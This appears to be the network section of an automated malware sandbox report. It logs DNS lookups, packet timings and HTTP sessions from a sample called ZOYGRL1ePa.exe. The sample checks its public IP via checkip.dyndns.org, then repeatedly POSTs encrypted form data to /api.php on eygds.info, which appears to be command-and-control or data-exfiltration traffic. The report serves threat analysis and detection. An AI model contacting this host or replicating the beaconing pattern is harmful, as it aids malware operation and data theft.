Dec 30, 2024 01:59:46.300884962 CET	80	50033	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.470556021 CET	50026	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:46.470658064 CET	50029	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:46.470732927 CET	50030	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:46.646831989 CET	50032	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:46.646863937 CET	50033	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:46.651766062 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.651803017 CET	80	50033	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.835927010 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.836008072 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.836044073 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.836076975 CET	50032	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:46.836078882 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.836136103 CET	50032	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:46.837250948 CET	50032	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:46.842135906 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.856312037 CET	80	50033	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.856540918 CET	80	50033	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.856575966 CET	80	50033	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.856610060 CET	80	50033	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.856658936 CET	50033	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:46.857362032 CET	50033	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:46.985860109 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.986197948 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.986232996 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.986248016 CET	50032	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:46.986268997 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.986272097 CET	50032	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:46.986299038 CET	50032	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:46.986304045 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.986354113 CET	50032	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:46.991085052 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.991122961 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.991132975 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.991218090 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.991246939 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.991255045 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.991266012 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.991489887 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.991499901 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.991636038 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.991645098 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.991648912 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.991656065 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:49.616600037 CET	50033	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:49.617896080 CET	50034	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:49.618623018 CET	50035	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:49.621994972 CET	80	50033	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:49.622133970 CET	50033	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:49.622701883 CET	80	50034	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:49.622806072 CET	50034	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:49.622874975 CET	50034	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:49.623528004 CET	80	50035	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:49.623581886 CET	50035	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:49.623666048 CET	50035	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:49.627710104 CET	80	50034	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:49.628458023 CET	80	50035	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:49.974951982 CET	50034	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:49.974951982 CET	50035	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:49.979991913 CET	80	50034	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:49.980026007 CET	80	50035	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.164352894 CET	80	50035	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.164535999 CET	80	50035	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.164572001 CET	80	50035	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.164596081 CET	50035	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:50.164607048 CET	80	50035	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.164685011 CET	50035	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:50.164875984 CET	50035	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:50.167660952 CET	80	50034	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.167720079 CET	80	50034	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.167772055 CET	80	50034	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.167783976 CET	50034	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:50.167802095 CET	80	50034	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.167836905 CET	80	50034	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.167958021 CET	50034	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:50.169742107 CET	80	50035	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.244297981 CET	50034	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:50.245496988 CET	50036	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:50.249346018 CET	80	50034	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.249444008 CET	50034	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:50.250359058 CET	80	50036	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.250432968 CET	50036	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:50.250516891 CET	50036	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:50.255284071 CET	80	50036	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.313733101 CET	80	50035	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.313767910 CET	80	50035	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.313802958 CET	80	50035	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.313831091 CET	50035	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:50.313838005 CET	80	50035	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.313894033 CET	50035	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:50.314146996 CET	80	50035	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.314276934 CET	50035	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:50.600089073 CET	50036	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:50.604973078 CET	80	50036	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.799794912 CET	80	50036	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.800079107 CET	80	50036	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.800113916 CET	80	50036	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.800142050 CET	50036	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:50.800188065 CET	80	50036	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.800270081 CET	50036	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:50.801126957 CET	50036	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:50.805953026 CET	80	50036	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.951354980 CET	80	50036	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.951395035 CET	80	50036	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.951430082 CET	80	50036	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.951462984 CET	80	50036	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.951494932 CET	50036	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:50.951631069 CET	80	50036	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:50.951682091 CET	50036	80	192.168.2.4	156.67.74.96

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 01:56:54.938386917 CET	62804	53	192.168.2.4	1.1.1.1
Dec 30, 2024 01:56:54.946414948 CET	53	62804	1.1.1.1	192.168.2.4
Dec 30, 2024 01:57:10.841068983 CET	58958	53	192.168.2.4	1.1.1.1
Dec 30, 2024 01:57:11.080538034 CET	53	58958	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 30, 2024 01:56:54.938386917 CET	192.168.2.4	1.1.1.1	0xa0d1	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 30, 2024 01:57:10.841068983 CET	192.168.2.4	1.1.1.1	0x778f	Standard query (0)	eygds.info	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 30, 2024 01:56:54.946414948 CET	1.1.1.1	192.168.2.4	0xa0d1	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 01:56:54.946414948 CET	1.1.1.1	192.168.2.4	0xa0d1	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 30, 2024 01:56:54.946414948 CET	1.1.1.1	192.168.2.4	0xa0d1	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 30, 2024 01:56:54.946414948 CET	1.1.1.1	192.168.2.4	0xa0d1	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 30, 2024 01:56:54.946414948 CET	1.1.1.1	192.168.2.4	0xa0d1	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 30, 2024 01:56:54.946414948 CET	1.1.1.1	192.168.2.4	0xa0d1	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 30, 2024 01:57:11.080538034 CET	1.1.1.1	192.168.2.4	0x778f	No error (0)	eygds.info		156.67.74.96	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

checkip.dyndns.org

eygds.info

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	158.101.44.242	80	6972	C:\Users\user\Desktop\ZOYGRL1ePa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:56:54.957715034 CET	68	OUT	GET / HTTP/1.1 Host: checkip.dyndns.org Connection: Keep-Alive
Dec 30, 2024 01:56:55.522501945 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 00:56:55 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ca25410b719c54a1de300160db289c2c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	156.67.74.96	80	6972	C:\Users\user\Desktop\ZOYGRL1ePa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:57:11.124106884 CET	278	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 286 Expect: 100-continue Connection: Keep-Alive
Dec 30, 2024 01:57:11.475157022 CET	286	OUT	Data Raw: 70 3d 32 71 48 30 4b 42 48 48 6c 70 4d 72 49 79 6b 47 2f 59 56 69 37 4a 56 31 25 32 42 25 32 42 45 37 71 41 77 32 37 52 72 62 56 7a 39 54 36 45 33 38 52 5a 33 48 57 59 7a 5a 75 6c 70 35 43 66 6c 6f 72 66 45 4a 58 63 47 66 49 54 6c 2f 74 48 35 33 Data Ascii: p=2qH0KBHHlpMrIykG/YVi7JV1%2B%2BE7qAw27RrbVz9T6E38RZ3HWYzZulp5CflorfEJXcGfITl/tH53qbP3ybh%2B5R%2BoQfDJYdxY%2BLeL4CfPUNjeMyQYy%2BhznJ/iR%2B8EfLeOyp5yqnHAxQIhLcFZI8Mkffz42B7krq2u7OXqqle7sxfGYqM4gionehlh7cV962TIKR3V7cktRe%2BNwMtZWMxPYK2AGL8riBZtj
Dec 30, 2024 01:57:11.650053978 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:57:11.650121927 CET	1236	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:57:11 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute;
Dec 30, 2024 01:57:11.650166035 CET	224	IN	Data Raw: 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 Data Ascii: } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" c
Dec 30, 2024 01:57:11.650177002 CET	1236	IN	Data Raw: 6f 6e 74 65 6e 74 3d 22 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65 20 69 73 20 6c 6f 73 74 2e 20 53 74 61 72 74 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 6f 6e 20 74 68 65 20 63 68 65 61 70 2e 22 3e 0a 20 20 20 20 Data Ascii: ontent="Oops, looks like the page is lost. Start your website on the cheap."> <link media="all" rel="stylesheet" href="/htdocs_error/style.css"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap
Dec 30, 2024 01:57:11.650188923 CET	92	IN	Data Raw: 63 69 64 65 6e 74 20 74 68 61 74 20 77 61 73 20 6e 6f 74 20 69 6e 74 65 6e 74 69 6f 6e 61 6c 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e Data Ascii: cident that was not intentional.</p> </div> </div></body></html>
Dec 30, 2024 01:57:11.665811062 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 318 Expect: 100-continue
Dec 30, 2024 01:57:11.814155102 CET	1236	IN	HTTP/1.1 100 Continue Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 53 65 70 20 32 30 32 31 20 31 32 3a 34 39 3a 30 33 20 47 4d 54 0d 0a 65 74 61 67 3a 20 22 39 39 39 2d 36 31 35 35 62 32 33 66 2d 39 62 31 65 32 64 61 38 31 30 39 64 34 36 64 33 3b 3b 3b 22 0d 0a 61 63 63 65 70 74 2d 72 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 32 34 35 37 0d 0a 64 61 74 65 3a 20 4d 6f 6e 2c 20 33 30 20 44 65 63 20 32 30 32 34 20 30 30 3a 35 37 3a 31 31 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 4c 69 74 65 53 70 65 65 64 0d 0a 70 6c 61 74 66 6f 72 6d 3a 20 68 6f 73 74 69 6e 67 65 72 0d 0a 70 61 6e 65 6c 3a 20 68 70 61 6e 65 6c 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 [TRUNCATED] Data Ascii: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Thu, 30 Sep 2021 12:49:03 GMTetag: "999-6155b23f-9b1e2da8109d46d3;;;"accept-ranges: bytescontent-length: 2457date: Mon, 30 Dec 2024 00:57:11 GMTserver: LiteSpeedplatform: hostingerpanel: hpanel<!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; [TRUNCATED]
Dec 30, 2024 01:57:11.814169884 CET	1236	IN	Data Raw: 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d Data Ascii: </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks like the pa
Dec 30, 2024 01:57:11.814183950 CET	304	IN	Data Raw: 74 64 6f 63 73 5f 65 72 72 6f 72 2f 73 6f 6d 65 74 68 69 6e 67 2d 6c 6f 73 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65 Data Ascii: tdocs_error/something-lost.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not intentional

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	156.67.74.96	80	6972	C:\Users\user\Desktop\ZOYGRL1ePa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:57:11.858184099 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 322 Expect: 100-continue
Dec 30, 2024 01:57:12.209455967 CET	322	OUT	Data Raw: 70 3d 50 6f 6d 42 33 4d 49 67 4d 49 56 66 74 64 49 55 35 35 57 39 56 63 6b 7a 31 4c 6a 71 76 62 6a 6b 4a 5a 32 38 5a 63 6f 33 70 39 6d 67 59 39 2f 6b 78 72 66 6e 6b 64 38 51 36 36 4d 78 36 55 53 57 44 25 32 42 4a 61 79 32 78 69 67 50 6a 43 4b 74 Data Ascii: p=PomB3MIgMIVftdIU55W9Vckz1LjqvbjkJZ28Zco3p9mgY9/kxrfnkd8Q66Mx6USWD%2BJay2xigPjCKt%2BJ66qwbQT4GD/cyl%2B2yboFvHCWuUaaM4RthB8d%2BEqOn/Z3/n3NXE8p4L%2BAMmrCOtbDsxPenR%2BeWdEu8dFFIFI6SrRlmRpmu1ZyaYSBmj2nl3FU%2BaNvYwoAOcsGCnOc9Kr%2Bdq%2Bm7g45DFgETVx
Dec 30, 2024 01:57:12.441356897 CET	1236	IN	HTTP/1.1 100 Continue Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 53 65 70 20 32 30 32 31 20 31 32 3a 34 39 3a 30 33 20 47 4d 54 0d 0a 65 74 61 67 3a 20 22 39 39 39 2d 36 31 35 35 62 32 33 66 2d 39 62 31 65 32 64 61 38 31 30 39 64 34 36 64 33 3b 3b 3b 22 0d 0a 61 63 63 65 70 74 2d 72 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 32 34 35 37 0d 0a 64 61 74 65 3a 20 4d 6f 6e 2c 20 33 30 20 44 65 63 20 32 30 32 34 20 30 30 3a 35 37 3a 31 32 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 4c 69 74 65 53 70 65 65 64 0d 0a 70 6c 61 74 66 6f 72 6d 3a 20 68 6f 73 74 69 6e 67 65 72 0d 0a 70 61 6e 65 6c 3a 20 68 70 61 6e 65 6c 0d 0a 0d 0a 3c 21 44 4f 43 54 59 [TRUNCATED] Data Ascii: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/htmllast-modified: Thu, 30 Sep 2021 12:49:03 GMTetag: "999-6155b23f-9b1e2da8109d46d3;;;"accept-ranges: bytescontent-length: 2457date: Mon, 30 Dec 2024 00:57:12 GMTserver: LiteSpeedplatform: hostingerpanel: hpanel<!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { [TRUNCATED]
Dec 30, 2024 01:57:12.441375971 CET	1236	IN	Data Raw: 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 Data Ascii: position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="descript
Dec 30, 2024 01:57:12.441386938 CET	341	IN	Data Raw: 65 64 22 3e 3c 69 6d 67 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 35 30 30 70 78 3b 22 20 73 72 63 3d 22 2f 68 74 64 6f 63 73 5f 65 72 72 6f 72 2f 73 6f 6d 65 74 68 69 6e 67 2d 6c 6f 73 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: ed"><img style="width:500px;" src="/htdocs_error/something-lost.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	156.67.74.96	80	6972	C:\Users\user\Desktop\ZOYGRL1ePa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:57:12.776216984 CET	278	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 586 Expect: 100-continue Connection: Keep-Alive
